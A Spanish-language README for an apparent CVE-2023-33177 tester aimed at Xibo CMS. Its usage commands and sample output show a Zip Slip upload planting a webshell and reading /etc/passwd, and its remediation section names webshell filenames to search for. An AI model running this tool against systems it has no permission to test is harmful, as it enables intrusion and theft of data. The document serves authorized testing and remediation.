
Probador de Vulnerabilidades CVE-2023-33177 en Xibo CMS
Herramienta automatizada de pruebas de seguridad para CVE-2023-33177: vulnerabilidad de path traversal de tipo Zip Slip en Xibo CMS que conduce a la ejecución remota de código (RCE).
Esta herramienta es solo para fines educativos y de pruebas autorizadas. Úsala únicamente en sistemas que poseas o para los que tengas permiso explícito de prueba. Las pruebas no autorizadas son ilegales y poco éticas.
Las versiones 1.8.0-2.3.16 y 3.0.0-3.3.4 de Xibo CMS son vulnerables a un ataque de path traversal a través de la funcionalidad de importación de layouts. Esta herramienta comprueba de forma segura si tu instancia de Xibo es vulnerable intentando escribir un archivo de prueba inofensivo.
## Clone the repository
git clone [email protected]:kaxm23/-CVE-2023-33177-.git
cd xibo-cve-2023-33177-tester
## Install requirements
pip install -r requirements.txt## -CVE-2023-33177-
Estructura básica de comandos
python test_cve_2023_33177.py <URL> <username> <password>
## Local development instance
python test_cve_2023_33177.py http://localhost/xibo admin password123
## Remote production with HTTPS
python test_cve_2023_33177.py https://xibo.example.com [email protected] SecurePass2024!
## Custom port and path
python test_cve_2023_33177.py http://192.168.1.100:8080/xibo admin mypassword
## Without trailing slash (script handles it)
python test_cve_2023_33177.py https://example.com/xibo admin pass
[*] Testing Xibo CMS at http://localhost/xibo
[*] CVE-2023-33177 - Zip Slip RCE Test
[+] Created test payload: test_vuln_1703123456.zip
[+] Successfully logged in as admin
[*] Attempting to import malicious layout...
[*] Import response: HTTP 200
[*] Checking for webshell...
[!] VULNERABLE! Webshell accessible at: http://localhost/security_test.php
[+] Successfully read /etc/passwd
[*] Output preview: VULN_TEST_root:x:0:0:root:/root:/bin/bash...
[!] Website IS VULNERABLE to CVE-2023-33177!
[!] Remediation: Update Xibo CMS to version 3.3.5+ or 2.3.17+
[!] Delete the test file: security_test.php
[*] Testing Xibo CMS at http://localhost/xibo
[*] CVE-2023-33177 - Zip Slip RCE Test
[+] Created test payload: test_vuln_1703123456.zip
[+] Successfully logged in as admin
[*] Attempting to import malicious layout...
[*] Import response: HTTP 200
[*] Checking for webshell...
[-] Webshell not found (HTTP 404)
[+] Website appears NOT vulnerable (or path differs)
## Download latest version
wget https://github.com/xibosignage/xibo-cms/releases/latest
## Follow upgrade instructions
## https://xibo.org.uk/manual/en/upgrade.html
## Find recently modified PHP files in web root
find /var/www/html -name "*.php" -mtime -7 -type f
## Check for suspicious files
find /var/www/html -name "shell.php" -o -name "cmd.php" -o -name "backdoor.php"
## Review access logs for unauthorized imports
grep "layout/import" /var/log/apache2/access.log
Cambia todas las contraseñas de los usuarios del CMS
Rota las claves de API y los tokens
Revisa y elimina las cuentas de usuario no autorizadas
`
📋 Requisitos
Python 3.6 o superior
librería requests (instalar con pip)
Credenciales válidas de Xibo CMS (se requiere autenticación)
Acceso de red a la instancia de Xibo objetivo
Haz un fork del repositorio
Crea una rama de funcionalidad: git checkout -b feature/amazing-feature
Haz commit de los cambios: git commit -m 'Add amazing feature'
Haz push a la rama: git push origin feature/amazing-feature
Abre un Pull Request
Requisitos para contribuir
El código debe seguir los estándares PEP 8
Las pruebas deben seguir siendo no destructivas
La documentación debe actualizarse
No realizar pruebas en vivo contra objetivos no autorizados
Este proyecto está licenciado bajo la Licencia MIT; consulta el archivo LICENSE para obtener más detalles.
⚖️ Uso legal y ético
Al utilizar esta herramienta, aceptas:
Probar únicamente sistemas que poseas o para los que tengas permiso explícito por escrito
Cumplir con todas las leyes locales, estatales y federales
No utilizar esta herramienta con fines maliciosos
Informar de las vulnerabilidades a los proveedores de forma responsable
Aceptar la plena responsabilidad por tus acciones
Entrada de CVE-2023-33177 en NVD
Avisos de seguridad de Xibo
Detalles de la vulnerabilidad Zip Slip
Guía de Path Traversal de OWASP
Incidencias: GitHub Issues
Informes de seguridad: divulga de forma responsable mediante el informe privado de vulnerabilidades de GitHub
Preguntas: abre un debate en GitHub
Si esta herramienta te ha resultado útil, ¡considera darle una estrella al repositorio!